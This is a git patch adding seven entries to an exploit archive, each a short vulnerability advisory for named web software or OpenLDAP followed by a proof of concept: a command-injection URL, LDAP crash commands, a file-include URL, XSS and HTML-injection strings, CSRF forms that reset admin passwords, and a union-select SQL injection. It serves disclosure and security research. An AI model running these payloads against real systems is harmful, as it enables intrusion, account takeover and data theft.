From 7fc5a86ea9c1c661652f13be8315501fa179f3ec Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 18 Aug 2014 04:41:16 +0000
Subject: [PATCH] Updated 08_18_2014

---
 files.csv                        |  7 +++++++
 platforms/cgi/webapps/34347.txt  |  9 +++++++++
 platforms/linux/dos/34348.txt    | 10 ++++++++++
 platforms/php/webapps/34349.txt  |  9 +++++++++
 platforms/php/webapps/34350.txt  |  7 +++++++
 platforms/php/webapps/34351.html |  9 +++++++++
 platforms/php/webapps/34352.html | 26 ++++++++++++++++++++++++++
 platforms/php/webapps/34353.txt  | 10 ++++++++++
 8 files changed, 87 insertions(+)
 create mode 100755 platforms/cgi/webapps/34347.txt
 create mode 100755 platforms/linux/dos/34348.txt
 create mode 100755 platforms/php/webapps/34349.txt
 create mode 100755 platforms/php/webapps/34350.txt
 create mode 100755 platforms/php/webapps/34351.html
 create mode 100755 platforms/php/webapps/34352.html
 create mode 100755 platforms/php/webapps/34353.txt

diff --git a/files.csv b/files.csv
index b73379930..0d7dbc7cc 100755
--- a/files.csv
+++ b/files.csv
@@ -30933,3 +30933,10 @@ id,file,description,date,author,platform,type,port
 34343,platforms/asp/webapps/34343.txt,"MOJO IWMS 7 'default.asp' Cookie Manipulation Vulnerability",2007-12-17,"cp77fk4r ",asp,webapps,0
 34344,platforms/asp/webapps/34344.txt,"Pre Jobo.NET Multiple SQL Injection Vulnerabilities",2009-12-17,bi0,asp,webapps,0
 34345,platforms/java/webapps/34345.txt,"jCore 'search' Parameter Cross Site Scripting Vulnerability",2009-12-17,loneferret,java,webapps,0
+34347,platforms/cgi/webapps/34347.txt,"iOffice 0.1 'parametre' Parameter Remote Command Execution Vulnerability",2010-07-18,"Marshall Whittaker",cgi,webapps,0
+34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 'modrdn' Request Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0
+34349,platforms/php/webapps/34349.txt,"Yacs CMS 10.5.27 'context[path_to_root]' Parameter Remote File Include Vulnerability",2010-07-18,eidelweiss,php,webapps,0
+34350,platforms/php/webapps/34350.txt,"Sourcefabric Campsite Articles HTML Injection Vulnerability",2010-07-15,D4rk357,php,webapps,0
+34351,platforms/php/webapps/34351.html,"BOLDfx eUploader 3.1.1 'admin.php' Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
+34352,platforms/php/webapps/34352.html,"BOLDfx Recipe Script 5.0 Multiple Remote Vulnerabilities",2009-12-16,"Milos Zivanovic ",php,webapps,0
+34353,platforms/php/webapps/34353.txt,"SnowFlake CMS 0.9.5 beta 'uid' Parameter SQL Injection Vulnerability",2010-07-19,"Dinesh Arora",php,webapps,0
diff --git a/platforms/cgi/webapps/34347.txt b/platforms/cgi/webapps/34347.txt
new file mode 100755
index 000000000..9293c3e38
--- /dev/null
+++ b/platforms/cgi/webapps/34347.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41768/info
+
+iOffice is prone to a remote command-execution vulnerability because the software fails to adequately sanitize user-supplied input.
+
+Successful attacks can compromise the affected software and the underlying server.
+
+iOffice 0.1 is affected; other versions may also be vulnerable.
+
+http://www.example.com/cgi-bin/index.pl?section_name=whatever&section=ioffice&parametre=|id| 
\ No newline at end of file
diff --git a/platforms/linux/dos/34348.txt b/platforms/linux/dos/34348.txt
new file mode 100755
index 000000000..a347e29f9
--- /dev/null
+++ b/platforms/linux/dos/34348.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41770/info
+
+OpenLDAP is prone to multiple vulnerabilities.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application or cause denial-of-service conditions.
+
+OpenLDAP 2.4.22 is vulnerable; other versions may also be affected.
+
+ldapmodrdn -x cn=something,dc=anything cn=#80
+ldapmodrdn -x dc=something,dc=anything dc= 
\ No newline at end of file
diff --git a/platforms/php/webapps/34349.txt b/platforms/php/webapps/34349.txt
new file mode 100755
index 000000000..eb259dd10
--- /dev/null
+++ b/platforms/php/webapps/34349.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41773/info
+
+Yacs CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+Yacs CMS 10.5.27 is vulnerable; other versions may be affected. 
+
+http://www.example.com/index.php?context[path_to_root]= [inj3ct0r shell] 
\ No newline at end of file
diff --git a/platforms/php/webapps/34350.txt b/platforms/php/webapps/34350.txt
new file mode 100755
index 000000000..5199369dc
--- /dev/null
+++ b/platforms/php/webapps/34350.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41780/info
+
+Sourcefabric Campsite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. 
+
+<marquee><h1>XSS3d By D4rk357</h1><marquee>
\ No newline at end of file
diff --git a/platforms/php/webapps/34351.html b/platforms/php/webapps/34351.html
new file mode 100755
index 000000000..f690969a7
--- /dev/null
+++ b/platforms/php/webapps/34351.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41783/info
+
+BOLDfx eUploader is prone to multiple remote vulnerabilities, including a cross-site request-forgery vulnerability, a security-bypass vulnerability, and an HTML-injection vulnerability.
+
+Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to perform certain administrative actions without proper authentication; other attacks are also possible.
+
+eUploader PRO 3.1.1 is vulnerable; other versions may also be affected.
+
+<form action="http://www.example.com/admin.php?page=user&id=[ID]" method="post"> <input type="hidden" name="id" value="[ID]"> <input type="hidden" name="admin_access" value="2"> <input type="hidden" name="email" value="my@email.com"> <input type="hidden" name="pass" value="hacked"> <input type="hidden" name="pass2" value="hacked"> <input type="submit" name="edit" value="Submit"> </form> 
\ No newline at end of file
diff --git a/platforms/php/webapps/34352.html b/platforms/php/webapps/34352.html
new file mode 100755
index 000000000..759dcd7d6
--- /dev/null
+++ b/platforms/php/webapps/34352.html
@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/41787/info
+
+BOLDfx Recipe Script is prone to multiple remote vulnerabilities, including multiple cross-site request-forgery vulnerabilities, an arbitrary file upload vulnerability, multiple HTML-injection vulnerabilities and multiple cross-site scripting vulnerabilities.
+
+Attacker-supplied HTML and script code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user. A remote attacker may also be able to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
+
+Recipe Script 5.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/recipes/admin/recipes.php?searchword="[XSS]
+http://www.example.com/recipes/admin/recipes.php?numitem="[XSS]
+http://www.example.com/recipes/admin/categories.php?searchword="[XSS]
+http://www.example.com/recipes/admin/categories.php?numitem="[XSS]
+http://www.example.com/recipes/admin/all_comments.php?searchword="[XSS]
+http://www.example.com/recipes/admin/all_comments.php?numitem="[XSS]
+http://www.example.com/recipes/admin/users.php?searchword="[XSS]
+http://www.example.com/recipes/admin/users.php?numitem="[XSS]
+http://www.example.com/recipes/admin/comments.php?searchword="[XSS]
+http://www.example.com/recipes/admin/comments.php?numitem="[XSS]
+http://www.example.com/recipes/admin/menus.php?numitem="[XSS]
+http://www.example.com/recipes/admin/links.php?searchword="[XSS]
+http://www.example.com/recipes/admin/links.php?numitem="[XSS]
+http://www.example.com/recipes/admin/banners.php?searchword="[XSS]
+http://www.example.com/recipes/admin/banners.php?numitem="[XSS]
+
+
+<form action="http://www.example.com/recipes/update_profile.php" method="POST"> <input name="first_name" type="text" value="DEMO"> <input name="last_name" type="text" value="USER"> <input name="website" type="text" value="website.com"> <input name="country" type="text" value="Moon State"> <input name="email" type="text" value="our@email.com"> <input type="checkbox" name="subscribed" value="1"> <input type="submit" name="Submit" value="Update"> </form> <form action="http://www.example.com/recipes/admin/adminpass.php" method="POST"> <input type="password" name="AdminPass" value="hacked"> <input type="password" name="cAdminPass" value="hacked"> <input type="submit" name="submit" value="Update Password"> </form> <form action="http://www.example.com/recipes/admin/send_email_users.php" method="POST"> <input type="hidden" name="from_email" value="support@site.com"> <input type="hidden" name="subject" value="Subject"> <input type="hidden" name="message" value="Free your mind and the ass will follow!"> <input type="hidden" name="emailtype" value=""> <input type="submit" name="Submit" value="Send"> </form> 
\ No newline at end of file
diff --git a/platforms/php/webapps/34353.txt b/platforms/php/webapps/34353.txt
new file mode 100755
index 000000000..c9677fbd3
--- /dev/null
+++ b/platforms/php/webapps/34353.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/41791/info
+
+SnowFlake CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SnowFlake CMS 1.0 beta5.2 is vulnerable. 
+
+
+http://www.example.com/page.php?cid=galleries&uid=1+and+1=2+union+select+1,concat%28version%28%29,0x3a,database%28%29, 
\ No newline at end of file